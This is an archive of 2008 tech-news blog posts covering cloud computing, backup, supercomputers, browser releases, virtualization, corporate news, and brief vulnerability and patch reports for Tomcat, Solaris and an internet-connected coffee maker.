Wednesday, June 25, 2008

Heads in the Clouds

Last night I attended Cloud Camp, an impromptu conference in San Francisco that focused on cloud computing. The event was thrown together in three weeks and took advantage of a large number of Web admins, developers, movers and shakers being in town for other shows. This was an unconference, a term coined years back at BarCamp, a collaborative get together that was created to show up O’Reilly’s exclusive Foo Camp. That means there were no scheduled talks or keynotes, only a big paper grid, some sharpies, and lots of enthusiastic folks to talk and ask questions.

When the attendees had announced their proposed sessions and placed them in the grid of times and meeting spaces, the 300 or so attendees filed out and went to chat about what exactly cloud computing is. And the resounding conclusion reached by most was that Cloud is the new SOA. And that’s not a good thing.

The first talk I attended was supposed to be about cloud architecture. Hurrah, I thought, let’s hear about how you open an account with Dell and get those servers into the grid 10 minutes after you unbox them. But, no, the talk ended up being a lengthy product pitch, veiled in a thin smear of “what’s in a cloud stack.” It quickly descended into the leader extolling the benefits of a cloud-based markup language used to describe system stacks. Of course, this was the lead engineer behind said markup language, and it was also the primary product of his startup.

Strike one.

Next, I attended a talk on using Ruby in the cloud, though the talk was ostensibly about reaching 1 billion page-views a month. This discussion focused on the success LinkedIn had using Joyent to host its Facebook application. All I got from this discussion, aside from some excellent Ruby speed tips, was the distinct feeling that I’m missing out on the gold rush taking place inside Facebook applications.

Strike two.

The most interesting part of the evening for me wasn’t the talks, though I hear Google’s Kevin Marks actually managed to spark up a good session, and that Amazon’s Web Services guys were there to listen to complaints. My night was capped off by a lengthy discussion with an unabashed, unashamed venture capitalist. We chatted for a long time about where the money could be made in the cloud. His conclusion was that there would eventually be big roles for middle-men. I called them integrators, but he wasn’t so confident in that term.

Foul tip, just down the third base line.

The trouble with the cloud, right now, is that it’s being used to describe a number of different types of systems. There’s the Google-Amazon system, where you build a non-critical application and host it inside the massive grid of computers at these Web companies. That’s what Cloud is supposed to mean. The other cloud, however, is the internal cloud. It’s a term used to describe a massive grid inside a company, where individual applications are provisioned, allocated, and dynamically resized to take advantage of a slice of this big grid. It’s a commodity in the basement that’s squeezed into injection-molded case scenarios.

Hmmm, sounds an awful lot like service-oriented architecture, doesn’t it? SOA can mean internal systems, connecting and chatting like we always wanted them to, but were never able to accomplish. Or, SOA can mean bringing in SaaS and tools from outside and tying them to internal systems. They’re almost exact opposites. But then, they aren’t at all. They just vie for the same resources, attention and standards. Yet making the Subversion server talk to the change management server is almost entirely unlike making Salesforce.com talk to your company’s exchange server.

And yet, they’re very similar. As similar as, say, two clouds. Shapes and forms, speeds and purposes aren’t the real meat of a cloud. The meat is in the viewer. What do you see in that cloud? Oh, Winnie the Pooh! And that one? A rain storm.

If my new VC friend is right, the clouds will soon be filling up with folks who can fill in the mortar between applications, servers and cloud hosts. Not unlike the wildly large ecosystem of SOA tools and products that sprouted up over the last three years, cloud computing will likely become a super buzz word, if it hasn’t already. It’ll be the place where we start to find new standards, new innovations, and new three-letter acronyms.

Let’s just hope that this time, there’s fewer standards involved. The last thing we need right now is a new set of WS*.

-- Alex Handy

Monday, June 23, 2008

Top 10 Reasons for Continuous Data Protection

At last week's HP confab in Las Vegas, FalconStor executive Peter Eicher gave a talk called "Ten Reasons You Need Continuous Data Protection."

FalconStor sells a solution in this area, and a few of the tips were product-centric, such as the flexibility to use any storage device or protocol you choose. Others, however, were more general in nature and address some issues regarding data backup and recovery.

Continuous data protection gives multiple recovery points, and moves away from the once-a-day practice of backing up data. "It's the single overriding reason" people adopt CDP, Eicher said. But there is the issue of data integrity to consider. Using what Eicher termed "full CDP," users are continually capturing data, so in the event of a disaster, nothing is lost. However, recovery time can be quite long. "Near CDP," he said, allows for snapshots of the data at regular intervals, making recovery quicker, but introducing the possibility of data loss, if something was written to the server between the last snapshot and the failure. "How bad is it if you miss a few transactions? If each order is for a million dollars, you don't want to miss any," he said.

Eicher also spoke about the benefits of server virutalization beyond simple consolidation, and how the technology can aid in backup and recovery. If you're running 10 virtual machines on one physical machine, you can issues at backup of CPU, memory and I/O capacity. FalconStor's approach to CDP lets users back up at the disk level, not the host level, so the impact is greatly reduced. And, from a recovery standpoint, you can have one VM standing in for 100 physical servers, and each can recover boot images from the CDP device. No longer is data recovery a one-to-one deal, Eicher noted.

CDP, he said, also helps organizations get rid of tape at remote offices, where the person in charge of changing tapes is usually not an IT worker, where tapes often get jammed, or can get lost in shipment back to headquarters, or he goes on vacation and no backup is done while he's gone. Using CDP, the data is kept on the box and replicated back to the data center, where it can then be transferred to tape storage.

At the conference, Eicher said he heard a unique use of CDP – one company was doing CDP for virus scanning. "Live scanning slows down the e-mail server a lot," he said. "By taking a snapshot of the e-mail server and running the virus scan against it, there's no impact to the live server. If a virus is found in one mailbox, you go right to it, without having to scan every mailbox. I thought that was a pretty interesting application of CDP."

-- David Rubinstein

Friday, June 20, 2008

Meep! Meep! IBM's Roadrunner Most Powerful Supercomputer

The TOP500 list of the world's most powerful supercomputers was released at the International Supercomputing Conference this week. And IBM hogged the top slots. The chipmaker claimed first place. And second. And third.

IBM's "Roadrunner" supercomputer won the title of the world's most powerful supercomputer. The Roadrunner, which is installed at the U.S. Department of Energy's Los Alamos National Laboratory, achieved a peak performance of 1.026 petaFLOPS, running past IBM's BlueGene L and P systems to claim first place.

Roadrunner is a hybrid processor that combines Cell Broadband Engine with AMD's Opteron dual-core processors, making it one of the most energy-efficient on the list.

The former holder of the title, Blue Gene/L at DOE's Argonne National Laboratory, came in second this year with a performance of 478.2 teraFLOPS. IBM also grabbed third place with the Team Blue Gene/P system at the Department of Energy's Argonne National Lab in Chicago.

Also at the top of list were Sun's SunBlade x6420 "Ranger" system at the University of Texas, and the Cray Xt4 "Jaguar" system at Oak Ridge National Lab in Tennessee.

While IBM claimed the top slots, Intel continued to dominate the list, with Intel processors now found in 75 percent of the TOP500 supercomputers, up from 70.8 percent of the 30th list released last year.
-- Michelle Savage

Thursday, June 19, 2008

Mozilla: Firefox Downloads Surpass 8 Million

Mozilla claimed a new download record for the release of Firefox 3.0 yesterday. It said that the newest version of the Firefox Web browser was downloaded more than 8 million times in the first 24 hours it was available.
Firefox devotees united in an attempt to set a world record for most software downloads in a single day. The category is new, and not yet certified by Guinness World Records, but it is expected to be approved this week.
The Tuesday release was delayed more than an hour as eager users checking for the new release overloaded Firefox's Web servers. To further complicate things, the site was slow or unreachable for about two hours just before the scheduled release time. Fortunately, the servers recovered and users were able to download nearly on schedule.
And download they did! During peak periods, servers were accommodating more than 9,000 downloads per minute. Within 24 hours, Firefox 3.0 was downloaded 8.3 million times, beating Mozilla’s prediction of 5 million downloads.
So what’s the big deal with this release? It includes enhancements to help users organize their favorite Web sites and block access to sites known to distribute malicious software. It also allows Yahoo mail users to use Firefox 3 to send e-mail by clicking a "mailto" link they might come across when clicking on a name, or a "contact us" link on a Web page. Before, these links could only open a standalone, desktop e-mail program. Firefox 3 also offers new design and speed improvements.

-- Michelle Savage

Wednesday, June 18, 2008

Noise on the Game Networks

As a video game enthusiast who landed a PlayStation 3 last Christmas, it’s been great to finally play games on the PlayStation Network. No longer do I have to stick with my PC for all my online gaming. It’s great to play a few rounds of Call of Duty 4 or Grand Theft Auto IV instead of being forced to rotate between DOTA and Day of Defeat.

Playing on the PSN is also my third major exposure to in-game voice chat, but the first time facing the notorious, oft-reported world of profane people (often children) heckling and cursing you out when playing them.

This is not news at all to anyone who’s ever played online, but I find it a hilarious phenomenon anyway. Before PSN, it was rare for me to encounter a chatter who would explode or otherwise disrupt the in-game voice chats by spamming noise so that nobody else could be heard. Usually, if anyone got out of hand, an admin could just step in and mute their Vent/Steam voice chat, and that would be that.

The servers I played on, which tended to be large and well organized, could be counted on to police that kind of behavior effectively. As such, the worst I ever encountered was someone playing their Casio keyboard into their mic, which brought back fond memories of my youth and my own keyboard. I wish I could remember that fellow’s name…

Anyway, the PSN is quite different. There are no admins and there are no organized servers; it’s just you and whoever else is out there randomly thrown together. I haven’t encountered too many voice chatters in GTAIV yet, but CoD4 provided a lot of material.

It’s probably not rocket science to figure out that the reason this kind of behavior is pervasive is because of anonymity. When you’re a 24-year-old playing in your own home, who is really going to discipline you for cracking racist jokes while waiting for a game to start? Who is really going to care, for that matter? Gamers have gone past the point where hearing a 10-year-old fling every curse in the book at you is anything special. It’s part of the landscape, and I think many of us find it fun.

So, if some kid in Tekonsha, Mich. wants to throw every slur up on the wall in Madden or NCAA Football, I say fire away, son.

-- Adam LoBelia

Coffee break-ing news

While the Internet has made journalism a lot easier--thanks to e-mail, information repositories and endless streams of PDF formatted research reports--it's also made writing about something unique more difficult. Take, for example, my desire to write a new blog posting today on something I found on the BugTraq mailing list. When Craig Wright, manager for risk advisory services at BDO Kendalls Pty. Ltd., sent out a message to the ubiquitous BugTraq yesterday, stating that he could hack his coffee maker, I was naturally intrigued.
The run-down is as follows: The Jura Impressa F90 is a super high-end coffee machine that offers an optional Internet connection kit. Wright, naturally, threw some attacks at the thing and discovered that it ran Windows XP. He also discovered that he could take over the OS with remote attacks. What can you do with a hacked coffee machine? Well, you can make it spit out more water than the cup will hold, making a black puddle nearby. Or, you can spin the dials on all the coffee maker settings so that it essentially crashes when trying to make a cup of joe.
Oh, and there's no way to patch the thing to prevent these vulnerabilities.
Naturally, this is the sort of exciting story we here at Systems Management News would love to report on, just for giggles. It would even be worth getting ahold of Mr. Wright for an interview.
Unfortunately, because this is the Internet, the story has already been posted on Slashdot, Digg, Boingboing, and a host of other sites around the Web. Therefore, I felt that it would be relatively pointless for me to even mention the thing here.
Of course, I just did. It's hard not to get all reportery, when people go plugging their kitchen appliances into the Internet. Up until now, the only Internet-connected appliances I've ever seen were a refrigerator at Microsoft's headquarters (A strange and out-of-place steel affair sitting in a visitor center, alone in the waiting area), and the NetBSD project's seminal toaster. Anyone who's been to a conference where NetBSD had a booth has seen this thing: It's a red multi-slice toaster with an LED screen pasted onto the side. The fact that this contraption actually ran NetBSD really made no difference to the toaster: it still toasted in the normal fashion. But the fundamental point of that kitchen appliance was to prove that NetBSD can, in fact, run on just about anything.
So, now that we've cleared all this up, I'm off to make some good old-fashioned tea by putting water inside of a metal pot and placing it on top of an open flame. And while I may still have to worry about finding original stories to report in this competitive news industry, at least I won't have to worry about someone hitting up my beverage with a buffer overflow.

-- Alex Handy

Yes, you should defrag your solid state drives

Two of the hottest trends in IT are solid-state drives and virtualization. Both have resulted in an accidental boon to Diskeeper, which just about owns the market for defragmentation utilities. In fact, the company is advising top SSD manufacturers about fragmentation, according to VP for public affairs Derek De Vette. Administrators are unsure what to do, posting queries on technology Web sites about defragging their SSDs. Interestingly, many experts are advising against SSD defragging, saying the concepts of contiguous placement and large-block storage are rendered moot by the new drives. Yet De Vette said fragmentation does occur, and that the performance hit of fragmentation is such that the hype of SSDs giving greater performance than mechanical disk drives hasn't yet been realized. As for virtualization, people understand that the hard drive can fragment, and so can the virtualized environment. But De Vette said most administrators are only beginning to realize that fragmentation can occur at the mapping level between the two layers. And he cautioned that too much fragmentation in a virtualized environment, just like in a physical one, can effectively shut it down.

-- David Rubinstein

Live, from HP Technology Forum

HP is making a few product announcements at its Technology Forum and Expo in Las Vegas this week, including change management and blade server technologies. But HP partners also have some news—here are the latest updates:

Ascert Provides Test Plug-in for Quality Center

Ascert today launched VersaTest Automation Plug-in for Quality Center, to provide a bridge between VersaTest Automator and HP's Quality Center that automatically creates central management, visibility, and a repository of tests and test results.

According to Rob Walker, managing partner of Ascert, VersaTest Automation Plug-in enables automation and expands the reach of Quality Center into parts of the enterprise that could not otherwise be accessed. Using the plug-in, Quality Center users can define and execute VersaTest server-level interface tests within Quality Center and validate the pass or fail results automatically.

Walker acknowledged that not all Quality Center users are willing to learn yet another product."So, we designed the plug-in to allow those users to execute VersaTest Automator tests and store test results from within the Quality Center software,” he said, adding that users do not have to acquire new skill sets to use it.

The VersaTest Automation Plug-in for Quality Center will run on Windows, Solaris and Linux servers.

HP User Groups “Connect”

Three large HP-focused user groups announced today that they have merged to provide a unified service to the 50,000 global users managing and maintaining old and new HP products and technologies.

By joining forces today, the former Encompass, HP-Interex EMEA and ITUG communities expect to expand their influence and power, while remaining independent of HP. The new group, called Connect, enables users to share knowledge and contacts while acting as a consumer advocate to HP.

The group plans to use Web 2.0 and social networking technologies to encourage community among its members and to attract a new generation of IT professionals, said Scott Healy, chairman of ITUG and vice president of industry solutions at Golden Gate Software.

-- Michelle Savage

Monday, June 16, 2008

High on Hyper-V

I went to an instructor-led lab at Microsoft Tech-Ed IT Professionals on Friday, where I was guided through the new capabilities in Windows Server 2008 that will enable Hyper-V virtualization. Since there is typically a difference in the user experience of a person who writes about technology (me) and a person who works with it every day (everyone else in the lab), I stopped a few attendees on the way out. Overall, the feedback was positive. Here are their comments:

“It’s so much better than their previous releases. It’s finally getting there. It’s good to see.”

“We all thought Microsoft was going to put out a cheap but crappy product and blow a lot of smoke about why wee need to switch from VMWare. But it (Hyper-V) actually looks pretty good."

“I like it! It’s perfect for small businesses—it has a dummy-proof wizard that makes it easy to set up and manage VMs. Overall, it’s better than I expected.”

“There are pluses and minuses. Hyper-V comes with a good console. But they say you can’t turn off the drivers, which could be a problem."

“Ack…I don’t know…..I still don’t know.”

-Michelle Savage

Friday, June 13, 2008

Quotes Flying? Better Duck!

Today, while working on a story about open source software in university IT systems, I had the distinct pleasure of speaking with a remarkably smart admin, whose name I can't use here. He's quoted in an upcoming story, but I can't call him by name in this piece because of some rather silly policies at his organization.

This fellow has his Unix down. He's a smooth operator with a vast knowledge of systems and software. But his statements are closely monitored by the university publicity department. They've obviously got everyone on campus trained well, because the admin told me we'd have to get approval for the story from these folks before we can run it.

He assured me that these were reasonable people, who wouldn't want to quibble with any details in the story; they'd just want to ensure they were covered from a liability standpoint. To illustrate this point, the admin told me that if I referred to his IT team by the college mascot name, something I was able to Duck in my article, that Systems Management News and I could be open to trademark lawsuit from the NCAA PAC 10 Conference. That mascot, is, after all, owned by the college and the conference.

I'm sure this was all a misunderstanding. I'm sure the university of this unnamed state, one of the many, many states in our nation that begins with the letter “O,” has no plans to sue us. I'm sure the fear was that we'd have a massive pull quote on the front page featuring the animal, cartoon character, and worst of all, the name of the college mascot. Or that we'd show a bump in single-issue sales for using a specific college logo on the cover. Or, heaven forbid, that our readers would learn that such bright, articulate people were associated with that university.

Unfortunately, such is life in this litigious society. And perhaps some universities are just too sensitive about becoming known as the place where Animal House was filmed.

-- Alex Handy

Wednesday, June 11, 2008

Microsoft Wants to Change Desktop Virtualization

Server virtualization is a hot topic at this year’s Tech-Ed IT Professionals conference, but Microsoft is bullish on the importance of application virtualization technology. In his keynote, Bob Muglia, senior vice president of Microsoft's Server and Tools Business unit, highlighted an untapped opportunity “to take and separate applications from the underlying operating system image, and allow those applications to be delivered much more effectively without going through a complex installation process.” He said we’ll see these technologies over the next few years.
To show off how far it has come in the desktop virtualization space, Microsoft demonstrated how it has integrated technology from Kidaro, a company it recently acquired, to develop its "Microsoft Enterprise Desktop Virtualization" product. This solution gives IT administrators the ability to "manage and deploy virtual PCs out to their end users' desktops," as per Jameel Khalfan, a product manager for Windows. Got an application that is incompatible with Vista? Kidaro lets it run in a virtual machine. The technology also lets users control copy-and-paste between a virtual machine (VM) and the host system. Users can also redirect URLs to a VM.
According to Khalfan, Microsoft Enterprise Desktop Virtualization application will be included in the Desktop Optimization Pack when that product is released next year. The general opinion of conference-goers is, that if Microsoft, can deliver on this promise, they’ll be heroes in the desktop virtualization market.

-- Michelle Savage

RTI Has Google to Thank

Real Time Innovations Inc. (RTI), spun off from a Stanford University robotics research group, has been providing real-time middleware to the aerospace and defense industries for about a dozen years. Its systems are used to coordinate communications for transportation, intelligence and simulations, so that information picked up by a radar system, for instance, can be fed into a larger data pool where it can then be analyzed, prioritized and responded to in real time.
So, what was RTI, a company with deep roots in the industrial embedded systems market, doing at the SIFMA financial markets conference and expo that began today in New York City? “It’s about real-time, low-latency messaging,” RTI vice president David Barnett told me over breakfast. He said RTI is partnering with a consulting company called Zivlyn Systems LLC to develop a trading platform designed specifically to handle higher volumes and replace legacy trading systems. RTI created a “data cloud” configuration that allows applications to subscribe to it, and RTI figures out the message switching and routing, as well as providing caching, filtering and other services. (The company also announced extended support for the .NET Framework and languages, to create a single infrastructure to support high-performance trading in heterogeneous environments.)
But how does a company servicing the military-industrial complex get a foot in the door in the financial markets? “They came to us, actually,” Barnett said. “Google is how they found us. We talk about low-latency and real time and high throughput, and those were the keywords they found us with. It turns out these are real problems in this market.”
Now, RTI is on the financial world's radar.

-- David Rubinstein

Tuesday, June 10, 2008

It's All in the Delivery

Vaclav Vincalek is puzzled. The founder of a startup software delivery provider called Boonbox recalls the days of ASP – application service providers – and how widely they were rejected by enterprises that scoffed at the notion of keeping their prized data and applications anywhere but behind locked and guarded doors. Now, just a few short years later, he can't believe that companies have the total trust to give up their data to outside organizations. Granted, security standards have come a long way -- or have they? Remember Hannaford, and how hackers stole credit card data from the supermarket chain's system that was certified PCI DSS compliant.
Boonbox is an offshoot of Pacific Coast Information Systems Ltd., (PCIS), an IT consultancy founded in 1995 to help businesses use the correct software to solve business problems. So Vincalek remembers the pushback to this method of delivery. "When e-mail was new and organizations wanted to install e-mail systems, we offered to host them, but they wanted the server in their server room. The mentality that e-mail would be moved out of the office was unheard of. " So the shift to more offsite hosting leaves Vincalek scratching his head, and taking shots at Google, where the application hosting platform is being built out, a la salesforce.com. "Google is the biggest threat to our privacy right now," Vincalek said. "They keep everything to themselves and don't tell you what they're doing with it."

-- David Rubinstein

Monday, June 9, 2008

Facebook's Now an Open Book

Facebook has open-sourced major areas of the Facebook Platform. Why? Because developers asked them to.
In a recent announcement, the social networking company said that this is "just a first step" in a major release. Now developers or any third party can download source code, which includes "most of the code that runs Facebook Platform plus implementations of many of the most-used methods and tags."
Most of the open-source code is being made available via the Common Public Attribution License (CPAL), while the FBML parser is governed by the Mozilla Public License (MPL).
While allowing the developer community to play with and improve the code base of Facebook Platform is probably the biggest benefit for going open source, competing social Web sites can now access the code to support their own third-party application deployment.
Word in the Valley is that Facebook’s move is a reaction to Open Social, an open source platform that is supported by Google, MySpace and Yahoo. OpenSocial threatens Facebook's platform, as it has to potential to make it easier for social networking sites to match Facebook's catalog of third-party applications.

-- Michelle Savage

Friday, June 6, 2008

GoogleTown -- Coming Soon to Mountain View

Internet giant Google is leasing land in Mountain View from NASA’s Ames Research Center to build a new research and development campus. But "high-tech campus" doesn’t quite describe what Google plans to build — it’s more like a mixed-use development.
The campus will contain 1.2 million square feet of office and research and development facilities on 42.2 acres in the research park. Here, Google will work on high-tech research projects, such as large-scale data management, massively distributed computing and human-to-computer interfaces.
But here’s where Google raises the bar. The company will also build "high-quality, affordable" housing on campus, in an attempt to attract top talent. It will also build restaurants, fitness facilities, a child care center, a basketball court, and conference and parking facilities for employees, while providing NASA with recreation and parking facilities and infrastructure improvements. There may even be room for retail shops in the future.
The lease is for 40 years but could be extended for up to 90 years. And it didn’t come cheap — Google agreed to pay $146 million over the lifetime of the lease.

-- Michelle Savage

Tomcat Vulnerable to HTML-Based Attack

The Apache Foundation's Tomcat Java application server is vulnerable to an HTML-based attack. The vulnerability, disclosed Wednesday and updated yesterday, allows remote attackers to inject HTML code into the hostname field of the host manager screen. The resulting code injection could be used to gather up administration cookies, allowing an attacker to take over the system if the operator has enable cookie-based authentication.

Tomcat version 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 are affected by this vulnerability. Tomcat does not check input in the hostname field for cleanliness, and thus allows this injection. As of today, Apache has not released a patch for this vulnerability.

--Alex Handy

Oh, the drama at Yahoo!

I’m not sure why any of us bother to watch staged reality TV shows when the real drama is unfolding before our very eyes in the form of Yahoo and Microsoft letters.
In the latest open letter to Yahoo Chairman Roy Bostock, billionaire investor Carl Icahn on Wednesday used the words "deceitful," "self-destructive," "misleading" and "insulting to shareholders" to express his frustration with what he sees as the "inordinate lengths" the company has gone to in keeping Microsoft from buying Yahoo.
Icahn's letter was sparked by details disclosed earlier this week in a lawsuit filed by Yahoo shareholders who disagree with the way Yahoo handled Microsoft’s recent $44.6 billion acquisition offer. Icahn wrote that Yang and other board members used unnecessary tactics, including a costly severance plan for Yahoo employees, to “entrench their positions and keep shareholders from deciding if they wished to sell to Microsoft," citing details from the shareholder suit.
He said that merging with Microsoft is the "only way to salvage" the company. "It is insulting to shareholders that Yahoo for the last month has told us that they are quite willing to negotiate a sale of the company to Microsoft and cannot understand why Microsoft has walked away," Icahn wrote. "However, the board conveniently neglected to inform shareholders about the magnitude of the plan it installed which made it practically impossible for Microsoft to stay at the bargaining table."
The company’s next shareholder meeting is Aug. 1, and Icahn has said he'll try to oust CEO Jerry Yang and others if they don’t change their ways. "It may be too late to convince Microsoft to trust Yang and the current board to run the company during that period while Microsoft sits on the sidelines with $45 billion at risk. Therefore, the best chance to bring Microsoft and Yahoo together is to replace Yang and the current Yahoo board with a board that will negotiate in good faith with Microsoft," he added.
Yahoo resisted the attack, saying in its reply letter that Icahn's criticism "seriously misrepresents and manipulates the facts.”
Icahn may want to get rid of Yang, but it will be hard to find a cheaper CEO. Yahoo's proxy filing cites Jerry Yang's salary in 2007 as $1, with no accounts of other compensation. Of course, he owns 3.9 percent of the company, but that would be his regardless.

-- Michelle Savage

Wednesday, June 4, 2008

Chinese Hackers Going Crazy Everywhere

Metasploit was hacked! Metasploit got hax0r3d! OMG, FYI, beware!

But wait, it’s not as bad as all that. The apotheosis of cool hacker tools was indeed attacked, but as it turns out, the Chinese hackers responsible never actually got into Metasploit’s servers.

According to HDM (H.D. Moore, project lead on your arch nemesis: Metasploit, the application exploitation payload framework), reports of Metasploit’s Web site being hacked were greatly exaggerated. In fact, they were just a testament to the old adage: “There is no such thing as 100 percent security.”

“They can’t pwn the real server, so they pwn one next to it,” wrote HD on IRC. “Then use that to 'man-in-the-middle’ the http responses and inject their own code.”

Essentially, the Chinese hackers—who have been quite active everywhere recently—no that’s not just your logs that see this—who wanted to own Metasploit had to compromise the entire ISP at which Metasploit’s Web site is hosted. When requests came in, the server nearest it on the switch played stand-in. Not that it mattered. The actual code of Metasploit is hosted elsewhere, and the MD5’s wouldn’t match up.

After all the kerfuffle over Chinese hackers I’ve heard over the last week and a half, I have to wonder if some of the resident rebels in China aren’t being forced into such nefarious hack attacks by government policies. I’m not saying that the Chinese government is encouraging hacking of foreign systems, but the country’s internal filtering and censoring policies could be forcing rebellious teens into hacking by default.

Since blogging about the mistakes of China’s policies is essentially illegal, it’s likely that the computer-literate—who in the U.S. write oodles of blogs and protest in the streets—have given up on effecting political change, and have instead spent their lives learning how to mess with other people’s data.

Everyone knows about the great firewall of China: that filter that keeps dissident content out of Chinese computers. Unfortunately, nothing seems to be filtering what’s coming out of China: an ever increasing flow of nasty packets aimed at bringing foreign servers to their knees.

And something about the month of May was particularly exciting for the Chinese hacker world. I’ve heard from a number of sources that their systems were under particularly high volumes of attacks as the month went on. Maybe this is just how China gets ready for the Olympics.
-- Alex Handy

Tuesday, June 3, 2008

Houston, We Have a Fire

The explosion and fire in Planet.com’s Houston, Texas, data center facility over this past weekend served as a scorching reminder of the importance of a strong backup plan.
Houston Fire Department officials said that the Planet.com Internet Services data center, where it creates, hosts and maintains Web sites for its clients, was rocked by an explosion in a network gear room. Apparently, no servers or networking equipment were damaged, and no one was hurt, but power was cut to the facility, affecting about 9,000 servers. The blast was strong enough to push three walls of the facility out of place. The incident was attributed to an electrical problem with a transformer. With an estimated 7,500 of its clients hoping the issue comes to a quick resolution, Planet.com is putting its recovery plan into action. Some servers will be relying on generator power for a week until normal utility connections are restored, according to Douglas Erwin, Planet.com’s CEO.
One of the interesting things that Planet.com employees are doing is providing updates on the data center’s progress through an online forum. This is seen as an important part of the disaster recovery plan. The latest updates say that the company is doing a rack-by-rack check for any servers that require technical support. Erwin said that 6,000 of the 9,000 servers have been restored, and the next step is to rebuild the electrical room, which will take place in the next week or so.
This fire certainly serves as a reminder that a good solid backup plan is critically important. Of course it is impossible to prepare for everything, but certain steps can be taken to assuage problems. Planet.com, for instance, added a backup server in March with continuous data protection. Turns out it wasn’t such a bad idea.

-- Jeff Feinman

Monday, June 2, 2008

Sun Patches Solaris

Sun Microsystems patched a number of vulnerabilities in Solaris 8, 9 and 10 over the past few days. Three stack-based buffer overflows in the SAMBA 3.0 code in Solaris 9 and 10 were patched. These three vulnerabilities could have allowed a remote user to inject code through SAMBA requests across a network. The patch for these vulnerabilities is available now. A second patch also can be obtained online. Additionally, Sun issued patches for Solaris 8, 9 and 10 that fix a hole in Crontab. Malicious users could potentially escalate their privileges on a system by creating race conditions in the Crontab utility. A fix is available.

--Alex Handy